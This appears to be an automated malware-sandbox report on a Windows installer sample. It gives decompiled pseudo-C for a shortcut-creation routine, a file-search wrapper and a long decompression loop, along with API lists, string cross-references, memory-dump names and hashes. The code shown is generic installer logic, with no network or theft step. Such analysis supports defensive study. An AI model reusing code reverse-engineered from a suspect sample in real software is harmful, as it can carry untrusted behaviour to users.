Part of subcall function 00405C17: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91

GetDiskFreeSpaceA.KERNEL32(00429870,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,00429870,00429870,?,?,000003FB,?), ref: 00404430
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404446
SetDlgItemTextA.USER32 ref: 0040449A

Strings

shlwapi.dll, xrefs: 004042A9
KERNEL32.dll, xrefs: 004043EA
GetDiskFreeSpaceExA, xrefs: 004043E5
m:X, xrefs: 00404467
SHAutoComplete, xrefs: 004042A4
A, xrefs: 0040432E
YVfgfgfgfgfg, xrefs: 00404363, 00404368, 00404373

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$SHAutoComplete$YVfgfgfgfgfg$m:X$shlwapi.dll
API String ID: 2007447535-1688661612
Opcode ID: 13ec250f15324b4634fface7d90eecd4de00bc56d5a8f4a37550fa7532b8bb5e
Instruction ID: f206f0ffef5a04671e447d0e91c878c3daa73ba4eb39f4f1c2dae132269ab5a2
Opcode Fuzzy Hash: 13ec250f15324b4634fface7d90eecd4de00bc56d5a8f4a37550fa7532b8bb5e
Instruction Fuzzy Hash: 508180B1A00218ABDB11EFA2CD45B9F7AB8EF44354F10417BFA04B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405554(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407430, _t75, 1, 0x407420, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407440, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409440 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409440, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409440, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x004020af
0x004020b9
0x004020c2
0x004020cc
0x004020d5
0x004020df
0x004020e3
0x004020e3
0x004020e8
0x004020f9
0x00402101
0x004021df
0x004021df
0x004021e6
0x00402107
0x00402107
0x00402118
0x0040211c
0x00402122
0x0040212c
0x0040212e
0x00402139
0x0040213c
0x00402149
0x0040214b
0x0040214d
0x00402154
0x00402157
0x00402157
0x0040215a
0x00402164
0x0040216c
0x00402171
0x0040217d
0x0040217d
0x00402180
0x00402189
0x0040218c
0x00402195
0x0040219a
0x004021ac
0x004021b5
0x004021bb
0x004021c7
0x004021c7
0x004021c9
0x004021cf
0x004021cf
0x004021d2
0x004021d8
0x004021dd
0x004021f2
0x00000000
0x00000000
0x00000000
0x004021dd
0x004021e8
0x00402932
0x0040293e

APIs

CoCreateInstance.OLE32(00407430,?,00000001,00407420,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409440,00000400,?,00000001,00407420,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402131

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 1efab7b31b85456446010618f0c6c7c3e14bd9a467c8a1600499b323e27bc476
Instruction ID: 4df27e177d60a4ea751ebd20e87b2fb7c9e865850ddb53f1d7743bd9643c1b3c
Opcode Fuzzy Hash: 1efab7b31b85456446010618f0c6c7c3e14bd9a467c8a1600499b323e27bc476
Instruction Fuzzy Hash: 5A415D75A00215AFCB00DFA4CD88E9E7BB6FF48319B20416AF905EB2E1CA759D41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026BC(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405939(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059DB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004026d4
0x004026e8
0x004026f3
0x004026f4
0x00402855
0x004026d6
0x004026d6
0x004026d8
0x004026da
0x004026da
0x00402932
0x0040293e

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 82b4643f9ce3c08722843be4bc63fbbd9fe595e1c0db63a2643e9360637e4537
Instruction ID: 9601d7ef4499486e177952c5a453970aa3bd803740f53fde15c253ab4d2be1f5
Opcode Fuzzy Hash: 82b4643f9ce3c08722843be4bc63fbbd9fe595e1c0db63a2643e9360637e4537
Instruction Fuzzy Hash: D5F0A0B2608110DFDB01EBA49E49AEEB778DF21324F60017BE141B20C1D6B84A499B3A

Uniqueness

Uniqueness Score: -1.00%

Function 004060D9, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E004060D9(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406848( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407314; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407314; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004068B0( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406808))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3b8;
												if( *0x42e3b8 != 0) {
													L22:
													_t412 =  *0x4093f8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x4093fc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d234; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d230; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d238;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6b8;
													if(_t416 < 0x42d6b8) {
														L15:
														__eflags = _t416 - 0x42d474;
														_t438 = 8;
														if(_t416 > 0x42d474) {
															__eflags = _t416 - 0x42d638;
															if(_t416 >= 0x42d638) {
																__eflags = _t416 - 0x42d698;
																if(_t416 < 0x42d698) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E004068B0(0x42d238, 0x120, 0x101, 0x407328, 0x407368, 0x42d234, 0x4093f8, 0x42db38, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d238, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d238 + _t440;
														E004068B0(0x42d238, 0x1e, 0, 0x4073a8, 0x4073e4, 0x42d230, 0x4093fc, 0x42db38, _t448 - 8);
														 *0x42e3b8 =  *0x42e3b8 + 1;
														__eflags =  *0x42e3b8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
